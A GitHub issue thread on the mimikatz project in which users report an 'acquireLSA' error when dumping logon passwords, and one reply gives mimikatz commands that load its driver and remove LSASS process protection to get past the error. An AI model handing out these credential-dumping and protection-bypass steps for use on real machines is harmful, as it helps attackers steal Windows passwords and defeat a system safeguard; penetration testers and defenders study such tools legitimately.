gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz
19.3k stars 3.7k forks source link

ERROR kuhl_m_sekurlsa_acquireLSA #401

Open jaysharma786 opened 2 years ago

jaysharma786 commented 2 years ago

I am using Invoke-mimikatz.ps1 i am get this error

mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations

I need to know why this error occur? how to resolve this error?

vinod50rao commented 1 year ago

Hi, I'm also using the latest version of mimikatz on windows 10 21H2, few days it was working fine but since yesterday getting the same error like the one Jay is getting. Can you please let us know is this something known to you

Papotito123 commented 1 year ago

Im also having this error now in Win 1909. Why ?

Papotito123 commented 1 year ago

Oh my. You should run privilege::debug !+ !processprotect /process:lsass.exe /remove

to remove lsass protection. At end ,run !- to. uninstall the driver.